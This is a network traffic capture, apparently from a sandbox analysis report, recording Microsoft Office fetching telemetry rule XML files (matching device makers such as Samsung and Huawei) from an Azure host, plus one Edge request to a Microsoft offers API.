2024-11-25 23:25:29 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:29 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232529Z-174f7845968cdxdrhC1EWRg0en0000000ue00000000007qn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:29 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.6	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:29 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:30 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:29 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232529Z-174f7845968kvnqxhC1EWRmf3g0000000dcg0000000002mh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:30 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.6	49772	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:30 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:31 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:31 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232530Z-174f7845968nxc96hC1EWRspw80000000ub00000000002db x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:31 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.6	49770	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:32 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:35 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:35 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232532Z-174f7845968v75bwhC1EWRuqen0000000fpg0000000000v5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:35 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.6	49773	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:32 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:33 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:32 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232532Z-174f78459684bddphC1EWRbht40000000uc00000000001ed x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:33 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.6	49774	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:32 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:33 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:32 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232532Z-174f7845968cpnpfhC1EWR3afc0000000u9g0000000001tt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:33 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.6	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:32 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:35 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:35 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232535Z-174f7845968v75bwhC1EWRuqen0000000fkg0000000002qp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:35 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.6	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:33 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:33 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:33 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232533Z-174f78459688l8rvhC1EWRtzr000000007400000000006ff x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:33 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49784	94.245.104.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:35 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:35 UTC	725	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Mon, 25 Nov 2024 23:25:35 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=9d90d64458d90255b6b35bbdd301682cde81e2f30fd042245a59b55dae0fc551;Path=/;HttpOnly;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinity=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.6	49782	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:35 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:35 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:35 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232535Z-174f7845968frfdmhC1EWRxxbw0000000ut00000000000h8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:35 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.6	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:35 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:35 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:35 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232535Z-174f7845968j6t2phC1EWRcfe80000000uv00000000001vh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:35 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.6	49791	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:37 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:37 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:37 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232537Z-174f7845968xlwnmhC1EWR0sv80000000ugg0000000000v6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:37 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.6	49792	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:37 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:38 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:37 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232537Z-174f7845968kvnqxhC1EWRmf3g0000000ddg00000000053x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
